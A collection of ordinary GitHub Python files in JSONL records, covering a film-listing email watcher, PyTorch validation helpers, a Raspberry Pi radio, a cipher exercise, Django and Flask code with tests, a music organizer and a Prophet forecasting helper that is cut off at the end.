+{"seq_id":"39781973493","text":"#!/usr/bin/python3\n\nimport requests\nimport urllib.parse\nfrom email.mime.text import MIMEText\n\n\nSEARCHES = [ \n 'Rocky Horror',\n 'Stilyagi',\n 'Whiplash',\n 'Liquid Sky',\n 'A Dangerous Method',\n 'Spirited Away',\n 'Synecdoche',\n 'Hurt Locker',\n 'Monster',\n 'Juno',\n 'Almost Famous',\n ]\n\n\ntry:\n # my login details are hidden here\n # you'll probably want to adjust below instead\n from doh.private import mailserver, EMAIL_FROM, EMAIL_TO\nexcept ImportError:\n EMAIL_FROM = 'from@example.com'\n EMAIL_TO = 'to@example.com'\n def mailserver():\n import smtplib\n server = smtplib.SMTP('host', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login('user', 'password')\n return server\n\n\ndef is_showing(searchterm):\n url = 'http://www.zitty.de/list?type=cinema&q=%s' % urllib.parse.quote_plus(searchterm)\n result = requests.get(url).text\n notfound = 'Keine Ergebnisse zu Ihrer Suchanfrage gefunden' in result\n return not notfound\n\n\n\ndef check_all():\n for term in SEARCHES:\n if is_showing(term):\n yield term\n\ndef watchdog():\n found = list(check_all())\n if not found:\n return\n server = mailserver()\n body = '''\n The following films were found showing in Berlin:\n '''\n for f in found:\n body += '\\n\\t\\t%s' % f\n mailtext = MIMEText(body)\n mailtext['To'] = EMAIL_TO\n mailtext['From'] = EMAIL_FROM\n mailtext['Subject'] = 'Films showing: %s' % ','.join(found)\n server.sendmail(EMAIL_FROM, EMAIL_TO, mailtext.as_string())\n\nif __name__ == '__main__':\n watchdog()\n","repo_name":"danohu/filmwatcher","sub_path":"filmwatcher/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"6303909365","text":"import logging\nimport time\n\nimport torch\nimport torch.utils.model_zoo as model_zoo\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\n\ndef validate(val_loader, model, criterion, input_size, print_freq=10):\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n top1 = AverageMeter('Acc@1', ':6.2f')\n top5 = AverageMeter('Acc@5', ':6.2f')\n progress = ProgressMeter(len(val_loader), [batch_time, losses, top1, top5], prefix='Test: ')\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n # warmup, reduce variability of first batch time, especially for comparing torchscript vs non\n # input = torch.randn((50,) + input_size).cuda()\n # model(input)\n end = time.time()\n for i, (images, target) in enumerate(val_loader):\n images = images.cuda()\n target = target.cuda()\n\n # compute output\n output = model(images)\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), images.size(0))\n top1.update(acc1[0], images.size(0))\n top5.update(acc5[0], images.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % print_freq == 0:\n progress.display(i)\n\n # TODO: this should also be done with the ProgressMeter\n print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'.format(top1=top1, top5=top5))\n\n return top1.avg\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the accuracy over the k top predictions for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef load_pretrained(model, cfg=None, num_classes=1000, in_chans=3, filter_fn=None, strict=True):\n if cfg is None:\n cfg = getattr(model, 'default_cfg')\n if cfg is None or 'url' not in cfg or not cfg['url']:\n logging.warning(\"Pretrained model URL is invalid, using random initialization.\")\n return\n\n state_dict = model_zoo.load_url(cfg['url'], progress=False, map_location='cpu')\n\n if in_chans == 1:\n conv1_name = cfg['first_conv']\n logging.info('Converting first conv (%s) from 3 to 1 channel' % conv1_name)\n conv1_weight = state_dict[conv1_name + '.weight']\n state_dict[conv1_name + '.weight'] = conv1_weight.sum(dim=1, keepdim=True)\n elif in_chans != 3:\n assert False, \"Invalid in_chans for pretrained weights\"\n\n classifier_name = cfg['classifier']\n if num_classes == 1000 and cfg['num_classes'] == 1001:\n # special case for imagenet trained models with extra background class in pretrained weights\n classifier_weight = state_dict[classifier_name + '.weight']\n state_dict[classifier_name + '.weight'] = classifier_weight[1:]\n classifier_bias = state_dict[classifier_name + '.bias']\n state_dict[classifier_name + '.bias'] = classifier_bias[1:]\n elif num_classes != cfg['num_classes']:\n # completely discard fully connected for all other differences between pretrained and created model\n del state_dict[classifier_name + '.weight']\n del state_dict[classifier_name + '.bias']\n strict = False\n\n if filter_fn is not None:\n state_dict = filter_fn(state_dict)\n\n model.load_state_dict(state_dict, strict=strict)\n","repo_name":"mengshaohua666/Attention_TSC_1","sub_path":"tools/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6964697169","text":"import asyncio\nimport logging\n\nimport RPi.GPIO as GPIO\nimport time\nimport RadioFunktions\nfrom LCD_Display.LCDSpaceArranger import *\nfrom LCD_Display.LCDDisplayManager import DisplayManager\nfrom IOButton.EventManager import Button\nfrom Internal.InternalOperation import InternalOperation\n\n\nprevTime = 0\ndispMan: DisplayManager\nrf: RadioFunktions.Radiofunctions\nButtons: Button\n\n\nasync def setup():\n InternalOperation.configLogging(\"./Radio.log\")\n try:\n InternalOperation.dumpPID()\n InternalOperation.shortenLog(200, \"./Restart.log\")\n dispMan = DisplayManager()\n Buttons = Button()\n rf = RadioFunktions.Radiofunctions()\n except Exception as e:\n logging.error(\"Setup failed\", exc_info=True)\n\n await Buttons.addEvent(19, Power)\n await Buttons.addEvent(13, VolumePlus)\n await Buttons.addEvent(6, VolumeMinus)\n await Buttons.addEvent(9, ChangePlayList)\n await Buttons.addEvent(26, ChangeSource)\n await Buttons.addEvent(5, PrevTitle)\n await Buttons.addEvent(11, NextTitle)\n\n # noch nicht Implementiert\n\n await dispMan.addContentWithShedule(Refresh, 1, 1)\n print(\"Startup succesfull\")\n\n\nasync def loop():\n try:\n await Buttons.LookForEvent()\n await dispMan.UpdateDisplay()\n except Exception as e:\n logging.error(\"occured in mainLoop\", exc_info=True)\n\n\n# Radio Functions\n\nasync def Refresh():\n return rf.getCurrentTitle()\n\n\nasync def Power():\n rf.ChangePowerState()\n await dispMan.toggleDisplay()\n await dispMan.addContentToDisplay(\" \", 1)\n logging.debug(\"Toggle Radio State\")\n\n\nasync def VolumePlus():\n await dispMan.addContentToDisplay(rf.Volume(\"+5\"), 2)\n logging.info(\"add volume\")\n\n\nasync def VolumeMinus():\n await dispMan.addContentToDisplay(rf.Volume(\"-5\"), 2)\n logging.info(\"reduce Volume\")\n\n\nasync def ChangePlayList():\n nPl = rf.ChangePlaylist()\n await dispMan.addContentToDisplay(nPl, 2)\n logging.debug(f\"Change Playlist to {nPl}\")\n\n\nasync def ChangeSource():\n src = rf.Changesource()\n await dispMan.addContentToDisplay(src, 2)\n logging.debug(f\"Change Playlist to {src}\")\n\n\nasync def NextTitle():\n rf.changeTitle(\"up\")\n\n\nasync def PrevTitle():\n rf.changeTitle(\"down\")\n\n\nif __name__ == \"__main__\":\n asyncio.run(setup())\n while (True):\n asyncio.run(loop())\n time.sleep(0.1)\n","repo_name":"LarsDerNorweger/Radio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"25400464080","text":"\ndef char2num(ch:str):\n return ord(ch.lower()) - 97\n\ndef num2char(num:int):\n return chr(num + 97)\n\nif __name__ == '__main__':\n \n while True:\n\n try:\n\n key = input()\n encryed = input()\n\n full_key = key\n index = 0\n decryed = \"\"\n for ch in encryed:\n decryedChNum:int = char2num(ch) -char2num(full_key[index])\n if decryedChNum < 0:\n decryedChNum += 26\n decryed += num2char(decryedChNum)\n full_key += decryed[-1]\n index += 1\n print(decryed)\n\n except:\n break\n","repo_name":"ImRTon/CipherAlgorithms","sub_path":"HW1 - Decrypt/02_Autokey_Cipher.py","file_name":"02_Autokey_Cipher.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45519116724","text":"import urllib\n\nfrom django.apps import apps as django_apps\nfrom django.contrib import messages\nfrom django.http.response import HttpResponseRedirect\nfrom django.urls.base import reverse\nfrom django.utils.text import slugify\nfrom django.views.generic.base import TemplateView\nfrom edc_base.view_mixins import EdcBaseViewMixin\nfrom edc_label.label import PrintLabelError\nfrom edc_label.print_server import PrintServerSelectPrinterError\n\nfrom ..mixins.models_view_mixin import ModelsViewMixin\n\n\nclass InvalidPostError(Exception):\n pass\n\n\napp_name = 'edc_pharmacy_dashboard'\napp_config = django_apps.get_app_config(app_name)\n\n\nclass BaseActionView(ModelsViewMixin, EdcBaseViewMixin, TemplateView):\n\n template_name = 'edc_pharmacy_dashboard/home.html'\n post_url_name = None\n app_config_name = 'edc_pharmacy_dashboard'\n\n valid_form_actions = []\n redirect_querystring = {}\n form_action_selected_items_name = 'selected_items'\n label_cls = None\n\n navbar_name = 'pharma'\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self._selected_items = []\n self.action = None\n\n @property\n def selected_items(self):\n \"\"\"Returns a list of selected listboard items.\n \"\"\"\n if not self._selected_items:\n self._selected_items = self.request.POST.getlist(\n self.form_action_selected_items_name) or []\n return self._selected_items\n\n @property\n def url_kwargs(self):\n \"\"\"Returns the default dictionary to reverse the post url. taixoo4M\n \"\"\"\n return {}\n\n @property\n def post_url(self):\n \"\"\"Returns a URL.\n \"\"\"\n print(self.post_url_name,\n \" self.post_url_name self.post_url_name self.post_url_name\")\n return reverse(self.post_url_name, kwargs=self.url_kwargs)\n\n def post(self, request, *args, **kwargs):\n action = slugify(self.request.POST.get('action', '').lower())\n if action not in self.valid_form_actions:\n raise InvalidPostError(\n 'Invalid form action in POST. Got {}'.format(action))\n else:\n self.action = action\n self.process_form_action()\n if self.redirect_querystring:\n return HttpResponseRedirect(\n self.post_url + '?'\n + urllib.parse.urlencode(self.redirect_querystring))\n return HttpResponseRedirect(self.post_url)\n\n def process_form_action(self):\n \"\"\"Override to conditionally handle the action POST attr.\n \"\"\"\n pass\n\n def print_labels(self, pks=None):\n \"\"\"Print labels for each selected item.\n\n See also: edc_pharma AppConfig\n \"\"\"\n for pk in pks:\n try:\n label = self.label_cls(pk=pk, children_count=len(pks))\n except PrintServerSelectPrinterError as e:\n messages.error(\n self.request,\n str(e), extra_tags='PrintServerSelectPrinterError')\n break\n else:\n try:\n result = label.print_label()\n except PrintLabelError as e:\n messages.error(self.request, str(e))\n else:\n messages.success(\n self.request,\n f'Printed {result.print_count}/{result.copies} {result.name} to '\n f'{result.printer}. JobID {result.jobid}')\n","repo_name":"botswana-harvard/edc-pharmacy-dashboard","sub_path":"edc_pharmacy_dashboard/views/action_views/base_action_view.py","file_name":"base_action_view.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6080865249","text":"# 킹\n\ndelta = [(0, 1), (0, -1), (1, 0), (-1, 0), (-1, 1), (-1, -1), (1, 1), (1, -1)]\n\narr = [[0 for _ in range(8)] for _ in range(8)]\nK, S, N = input().split()\ni, j = 8 - int(K[1]), ord(K[0]) - 65\nii, jj = 8 - int(S[1]), ord(S[0]) - 65\n\nfor _ in range(int(N)):\n move = input()\n if move == 'R':\n dir = 0\n elif move == 'L':\n dir = 1\n elif move == 'B':\n dir = 2\n elif move == 'T':\n dir = 3\n elif move == 'RT':\n dir = 4\n elif move == 'LT':\n dir = 5\n elif move == 'RB':\n dir = 6\n elif move == 'LB':\n dir = 7\n\n ni, nj = i + delta[dir][0], j + delta[dir][1]\n nii, njj = ii + delta[dir][0], jj + delta[dir][1]\n if 0 <= ni < 8 and 0 <= nj < 8:\n if ni == ii and nj == jj:\n if 0 <= nii < 8 and 0 <= njj < 8:\n ii, jj = nii, njj\n else:\n continue\n i, j = ni, nj\n\nsolK = chr(j + 65) + str(8 - i)\nsolS = chr(jj + 65) + str(8 - ii)\nprint(solK, solS, sep='\\n')","repo_name":"minguno/Algorithm","sub_path":"BAEKJOON/BOJ_1063.py","file_name":"BOJ_1063.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1993055244","text":"import os\nimport re\nimport shutil\nimport glob\nimport operator\nfrom pathlib import Path\nfrom tinytag import TinyTag\n\n\ndef get_music_in_directory(path) -> list:\n \"\"\"gets all the music file names in the directory (mp3 and m4a).\n\n Args:\n path (string): the Music folder path.\n\n Returns:\n list: a list of strings that represent the file names.\n \"\"\"\n return glob.glob(path + '*.mp3') + glob.glob(path + '*.m4a')\n\n\ndef add_artist_album_info() -> None:\n \"\"\"\n organizes the raw list of string (raw_file_names) as a raw list of tuples\n that consist (song.artist, song.album, file_name).\n \"\"\"\n for i, file in enumerate(raw_file_names):\n tag = TinyTag.get(raw_file_names[i])\n raw_file_names[i] = (tag.artist, tag.album, file)\n\n\ndef sort_raw_data() -> None:\n \"\"\"\n sorts the raw list of tuples (raw_file_names) in an ascending order\n with priority to album, and then file name.\n \"\"\"\n raw_file_names.sort(key=operator.itemgetter(1, 2))\n\n\ndef initialize_sorted_list() -> None:\n \"\"\"\n takes the raw list of tuples (raw_file_names) and extracts each album data to a list\n which is added to the sorted_music_info list.\n \"\"\"\n album = []\n for file in raw_file_names:\n album_name = file[1]\n\n if raw_file_names.index(file) + 1 == len(raw_file_names):\n album.append(file)\n sorted_music_info.append(album)\n\n elif album_name == raw_file_names[raw_file_names.index(file) + 1][1]:\n album.append(file)\n\n else:\n album.append(file)\n sorted_music_info.append(album)\n album = []\n\n\ndef move_to_directory() -> None:\n \"\"\"\n creates a directory to each album by the format of : \"artist + album + year\"\n and then moves each song to its album directory.\n \"\"\"\n for album in sorted_music_info:\n tag = TinyTag.get(album[0][2])\n folder_name = f'{tag.artist} - {tag.album} ({tag.year.split(\"-\",1)[0]})'\n folder_name = re.sub(r'[!@#$%^&*/?\"<:>|\\\\\\\\]', '', folder_name)\n\n if os.path.isdir(folder_name) is False:\n os.mkdir(folder_name)\n for song in album:\n shutil.move(song[2], folder_name)\n\n\ndef extract_from_directories():\n \"\"\"\n does the exact opposite job from move_to_directory() (with directory removal)\n mainly for testing purposes.\n \"\"\"\n directories = glob.glob(\"*/\")\n for directory in directories:\n files_to_extract = get_music_in_directory(directory)\n for file in files_to_extract:\n shutil.move(file, os.getcwd())\n os.rmdir(directory)\n\n\nos.chdir(f'{Path.home()}/Music/')\nraw_file_names = get_music_in_directory('')\nsorted_music_info = []\nadd_artist_album_info()\nsort_raw_data()\ninitialize_sorted_list()\nmove_to_directory()\n# extract_from_directories()\n","repo_name":"ImSo3K/music-folderOrganizer","sub_path":"organizer/organizer.py","file_name":"organizer.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72143653364","text":"import pathlib\nimport pytest\nimport shutil\nimport sqlite3\n\nimport pandas as pd\n\nfrom clotho.clothodb import ClothoDB\nfrom clotho.logutils import start_logging\nfrom clotho.resourceshed import ResourceShed\nfrom clotho.tool import Tool\nfrom clotho.toolparam import ToolParam\n\nCONFIG_NAME = 'ClothoConfig.yaml'\nDATA_FOLDER = pathlib.Path(__file__).parents[1] / 'data'\nINPUT_FOLDER = DATA_FOLDER / 'input'\nINPUT_CONFIG = INPUT_FOLDER / CONFIG_NAME\nOUTPUT_FOLDER = DATA_FOLDER / 'output'\nOUTPUT_CONFIG = OUTPUT_FOLDER / CONFIG_NAME\nDB_PATH = OUTPUT_FOLDER / 'TestDB.sqlite'\n\nPARAM1_ID = 'bogus1'\nPARAM2_ID = 'bogus2'\nTOOL_ID = 'bogustool'\n\nCLOTHO_FOLDER = INPUT_FOLDER / 'SkiWX' / 'ClothoDB'\nOUTPUT_CLOTHO_DB = OUTPUT_FOLDER / 'SkiWX' / 'ClothoDB.sqlite'\n\nCONFIG_1 = {\n 'ToolID': TOOL_ID,\n 'ParamID': PARAM1_ID,\n 'Name': 'endpoint',\n 'Value': 'https://devapi.terracon.com/employees/'\n}\nCONFIG_2 = {\n 'ToolID': TOOL_ID,\n 'ParamID': PARAM2_ID,\n 'Name': 'output_csv',\n 'Value': 'C:/Temp/Employees.csv'\n}\n\n\ndef create_db():\n if OUTPUT_CLOTHO_DB.exists():\n OUTPUT_CLOTHO_DB.unlink()\n OUTPUT_CLOTHO_DB.parent.mkdir(parents=True, exist_ok=True)\n connection = sqlite3.connect(OUTPUT_CLOTHO_DB)\n for csv in CLOTHO_FOLDER.glob('*.csv'):\n df = pd.read_csv(csv)\n df.to_sql(csv.stem, connection, if_exists='replace', index=False)\n connection.close()\n\n\ndef write_params():\n db = ClothoDB(DB_PATH)\n db.build_schema()\n db.set_row('ToolParams', CONFIG_1, 'ParamID')\n db.set_row('ToolParams', CONFIG_2, 'ParamID')\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef setup():\n start_logging()\n create_db()\n write_params()\n\n\n@pytest.fixture\ndef db():\n return ClothoDB(DB_PATH)\n\n\ndef get_extractor_gz():\n tool_id = Tool(OUTPUT_CLOTHO_DB, {'Name': 'Extract Weather'}).id\n shed = ResourceShed(OUTPUT_CLOTHO_DB)\n return ToolParam(\n OUTPUT_CLOTHO_DB,\n {'Name': 'gz_file', 'ToolID': tool_id},\n resource_shed=shed\n )\n\n\n@pytest.fixture\ndef extractor_gz():\n return get_extractor_gz()\n\n\n@pytest.fixture\ndef extractor_csv():\n tool_id = Tool(OUTPUT_CLOTHO_DB, {'Name': 'Extract Weather'}).id\n shed = ResourceShed(OUTPUT_CLOTHO_DB)\n return ToolParam(\n OUTPUT_CLOTHO_DB,\n {'Name': 'output_path', 'ToolID': tool_id},\n resource_shed=shed\n )\n\n@pytest.fixture\ndef victim(db):\n return ToolParam(db, id=PARAM1_ID)\n\n\ndef test_init(db):\n param = ToolParam(db, id=PARAM1_ID)\n assert 'devapi' in param.config['Value']\n\n param = ToolParam(db, config={'ToolID': TOOL_ID, 'name': 'output_csv'})\n assert param.config['ParamID'] == PARAM2_ID\n\n param = ToolParam(db)\n assert param.config['ParamID'] is None\n\n\ndef test_commit(db):\n row = db.get('ToolParams', \"\"\" \"ParamID\" == '{}' \"\"\".format(PARAM1_ID))\n assert row['Name'].iloc[0] == 'endpoint'\n\n param = ToolParam(db, config={'ToolID': TOOL_ID, 'name': 'EndPoint'})\n param.commit(TOOL_ID)\n\n row = db.get('ToolParams', \"\"\" \"ParamID\" == '{}' \"\"\".format(PARAM1_ID))\n assert row['Name'].iloc[0] == 'EndPoint'\n\n param = ToolParam(db, config={'ToolID': TOOL_ID, 'name': 'query'})\n param.commit(TOOL_ID)\n\n row = db.get('ToolParams', \"\"\" \"Name\" == 'query' \"\"\")\n assert row['ParamID'].iloc[0]\n\n\ndef test_configure(victim):\n victim.configure(CONFIG_2)\n assert victim.id == PARAM2_ID\n\n\ndef test_get_resource(extractor_gz):\n assert extractor_gz.get_resource().name == 'METAR GZ'\n\n\ndef test_id(victim):\n assert victim.id == PARAM1_ID\n\n\ndef test_is_input(extractor_gz, extractor_csv):\n assert extractor_gz.is_input\n assert not extractor_csv.is_input\n\n\ndef test_is_read(extractor_gz, extractor_csv):\n assert extractor_gz.is_read\n\n\ndef test_is_write(extractor_gz, extractor_csv):\n assert extractor_csv.is_write\n\n\ndef test_record_io(extractor_gz):\n extractor_gz.record_io('Activity1', 'My.gz')\n db = ClothoDB(OUTPUT_CLOTHO_DB)\n row = db.get_row('ActivityIO', 'ActivityID', 'Activity1')\n assert row['Value'] == 'My.gz'\n\n\ndef test_value(extractor_gz):\n assert extractor_gz.value is None\n extractor_gz.value = 'asdf'\n assert extractor_gz.value.endswith('ClothoDemo/asdf')\n\n\nif __name__ == '__main__':\n start_logging()\n create_db()\n write_params()\n test_init(ClothoDB(DB_PATH))\n test_value(get_extractor_gz())\n","repo_name":"jswise/Clotho","sub_path":"tests/test_toolparam.py","file_name":"test_toolparam.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42081224087","text":"'''\nAn exercise to find two numbers that add up to a target in a list of integers.\n'''\nimport sys\n\nnums = []\nTARGET = int()\ntry:\n TARGET = int(input(\"Enter a target: \"))\nexcept ValueError:\n print(\"That's not a number!\")\nif not TARGET:\n print(\"User error. Replace user. Fatal error - exiting.\")\n sys.exit()\n\n\nprint(\"Input a blank line to end the list.\")\nwhile True:\n try:\n print(f\"The list so far: {nums}\")\n entry = int(input(\"Enter a number: \"))\n except ValueError:\n print(\"That's not a number!\")\n break\n nums.append(entry)\n\n\nprint(nums)\nfor first_index, num in enumerate(nums):\n for second_index, other_num in enumerate(nums):\n\n if nums[first_index] + nums[second_index] == TARGET:\n print(f\"Found it! The answer was: {first_index}, {second_index}\")\n print(f\"The solution is {nums[first_index]} and {nums[second_index]}.\")\n sys.exit()\nprint(\"The answer was not found.\")\n","repo_name":"nickvulcan/just_for_fun","sub_path":"solution_check/find_sums.py","file_name":"find_sums.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20301144130","text":"import json\nimport datetime\n\nfrom sqlalchemy.sql import insert\nfrom flask import url_for\n\nfrom app.models.products import Product, Brand, Category\n\n\ndef create_fixture_data(session):\n brands = Brand.metadata.tables['brands']\n categories = Category.metadata.tables['categories']\n products = Product.metadata.tables['products']\n products_categories = Product.metadata.tables['products_categories']\n\n brands_data = [\n {'name': 'Apple', 'country_code': 'US'},\n {'name': 'Milka', 'country_code': 'DE'}\n ]\n\n categories_data = [\n {'name': 'Mobile phones'},\n {'name': 'Food'}\n ]\n\n products_data = [\n {\n 'name': 'iPhone', 'rating': 10, 'featured': True,\n 'items_in_stock': 10, 'receipt_date': None,\n 'created_at': datetime.datetime.utcnow()\n },\n {\n 'name': 'Chocolate', 'rating': 7, 'featured': False,\n 'items_in_stock': 0,\n 'receipt_date': (\n datetime.datetime.utcnow() +\n datetime.timedelta(days=10)\n ),\n 'created_at': datetime.datetime.utcnow()\n }\n ]\n\n # insert initial brands\n for brand in brands_data:\n result = session.execute(insert(brands).values(brand))\n brand['id'] = result.lastrowid\n\n # insert initial categories\n for category in categories_data:\n result = session.execute(insert(categories).values(category))\n category['id'] = result.lastrowid\n\n # insert initial products\n for i, product in enumerate(products_data):\n product['brand_id'] = brands_data[i]['id']\n result = session.execute(insert(products).values(product))\n product['id'] = result.lastrowid\n\n # associate product with a category\n session.execute(insert(products_categories).values({\n 'product_id': product['id'],\n 'category_id': categories_data[i]['id']\n }))\n\n session.commit()\n\n\ndef test_products_empty_list(client):\n url = url_for('products.get_products')\n\n with client as c:\n response = c.get(url)\n\n assert response.status_code == 200\n json_data = json.loads(response.data)\n assert json_data['results'] == []\n\n\ndef test_products_list(client, session):\n create_fixture_data(session)\n\n url = url_for('products.get_products')\n\n with client as c:\n response = c.get(url)\n\n assert response.status_code == 200\n json_data = json.loads(response.data)\n assert len(json_data['results']) == 2\n\n\ndef test_product_details_not_exists(client):\n\n url = url_for('products.get_product', product_id=1)\n\n with client as c:\n response = c.get(url)\n\n assert response.status_code == 404\n\n\ndef test_product_details(client, session):\n create_fixture_data(session)\n\n url = url_for('products.get_product', product_id=1)\n\n with client as c:\n response = c.get(url)\n\n assert response.status_code == 200\n json_data = json.loads(response.data)\n assert json_data['id'] == 1\n\n\ndef test_product_delete(client, session):\n create_fixture_data(session)\n\n url = url_for('products.delete_product', product_id=1)\n\n with client as c:\n response = c.delete(url)\n\n assert response.status_code == 204\n\n\ndef test_product_delete_not_exists(client):\n url = url_for('products.delete_product', product_id=1)\n\n with client as c:\n response = c.delete(url)\n\n assert response.status_code == 204\n\n\ndef test_product_create(client, session):\n create_fixture_data(session)\n\n url = url_for('products.create_product')\n\n with client as c:\n response = c.post(\n url,\n json={\n 'brand_id': 1,\n 'categories': [1],\n 'expiration_date': None,\n 'featured': True,\n 'items_in_stock': 10,\n 'name': 'oPhone',\n 'rating': 10.0,\n 'receipt_date': None\n },\n )\n\n assert response.status_code == 201\n json_data = json.loads(response.data)\n assert json_data['id'] == 3\n assert json_data['name'] == 'oPhone'\n assert len(json_data['categories']) == 1\n\n\ndef test_product_create_with_invalid_field_name(client, session):\n create_fixture_data(session)\n\n url = url_for('products.create_product')\n\n with client as c:\n # Name length\n response = c.post(\n url,\n json={\n 'brand_id': 1,\n 'categories': [1],\n 'expiration_date': None,\n 'featured': True,\n 'items_in_stock': 10,\n 'name': 'o' * 60,\n 'rating': 10.0,\n 'receipt_date': None\n },\n )\n\n assert response.status_code == 400\n json_data = json.loads(response.data)\n assert 'name' in json_data['errors']\n assert json_data['errors']['name'][0] == (\n 'Field cannot be longer than 50 characters.'\n )\n\n\ndef test_product_create_with_invalid_field_categories(client, session):\n create_fixture_data(session)\n\n url = url_for('products.create_product')\n\n with client as c:\n # A product must have from 1 to 5 categories.\n\n response = c.post(\n url,\n json={\n 'brand_id': 1,\n 'categories': [],\n 'expiration_date': None,\n 'featured': True,\n 'items_in_stock': 10,\n 'name': 'oPhone',\n 'rating': 10.0,\n 'receipt_date': None\n },\n )\n\n assert response.status_code == 400\n json_data = json.loads(response.data)\n assert 'categories' in json_data['errors']\n assert json_data['errors']['categories'][0] == (\n 'A product must have from 1 to 5 categories'\n )\n\n\ndef test_product_create_with_invalid_field_expiration_date(client, session):\n create_fixture_data(session)\n\n url = url_for('products.create_product')\n\n with client as c:\n # If a product has an expiration date it must expire not\n # less than 30 days since now.\n response = c.post(\n url,\n json={\n 'brand_id': 1,\n 'categories': [1],\n 'expiration_date': datetime.datetime.utcnow().strftime(\n '%Y-%m-%d %H:%M:%S'\n ),\n 'featured': True,\n 'items_in_stock': 10,\n 'name': 'oPhone',\n 'rating': 10.0,\n 'receipt_date': None\n },\n )\n\n assert response.status_code == 400\n json_data = json.loads(response.data)\n assert json_data['errors']['expiration_date'][0] == (\n 'must expire not less than 30 days since now.'\n )\n\n\ndef test_product_update_not_exists(client, session):\n create_fixture_data(session)\n\n url = url_for('products.update_product', product_id=7)\n\n with client as c:\n response = c.put(url)\n\n assert response.status_code == 404\n\n\ndef test_product_update(client, session):\n create_fixture_data(session)\n\n url = url_for('products.update_product', product_id=2)\n\n with client as c:\n response = c.put(\n url,\n json={\n 'rating': 11.0,\n },\n )\n\n assert response.status_code == 200, response.data\n json_data = json.loads(response.data)\n assert json_data['rating'] == 11.0\n assert json_data['featured'] is True\n","repo_name":"rombr/spark-test-task","sub_path":"tests/test_products_api.py","file_name":"test_products_api.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41118481093","text":"from prophet import Prophet\n\ndef run_forecast_univariate(df, periods):\n\n \"\"\"\n returns the univariate prophet forecast + two graphic objects (forecast & components)\n\n Parameters\n ----------\n df: DataFrame\n a dataframe that includes the historical data\n periods: int\n the time steps to forecast\n\n Returns\n -------\n forecast\n a dataframe containing the foecast data\n fig_forecast\n a figure forecast to plot\n fig_components\n a figure components to plot\n \n \"\"\"\n\n #renaming columns for prophet convention\n df = df.rename(columns = {df.columns[0]: \"ds\", df.columns[1]:\"y\"})\n\n # creating a Prophet object \n ## optional parameters can be set here like:\n ## seasonality, changepoints, uncertainty intervals etc. see help(Prophet)\n m = Prophet() \n\n # fit() methods expects a dataframe with the column heads ds and y\n # fits the prophet model to the data\n m.fit(df)\n\n # Definition of forecast range\n ## periods: Int number of periods to forecast forward. \n ## req: Any valid frequency for pd.date_range, such as 'D' or 'M'.\n future = m.make_future_dataframe(periods=periods, freq = \"H\")\n \n # Prediction\n ## expects a dataframe with dates for predictions \n ## (created above with make_future_dataframe)\n forecast = m.predict(future)\n \n # plotting\n fig_forecast = m.plot(forecast)\n fig_comp = m.plot_components(forecast)\n \n return forecast, fig_forecast, 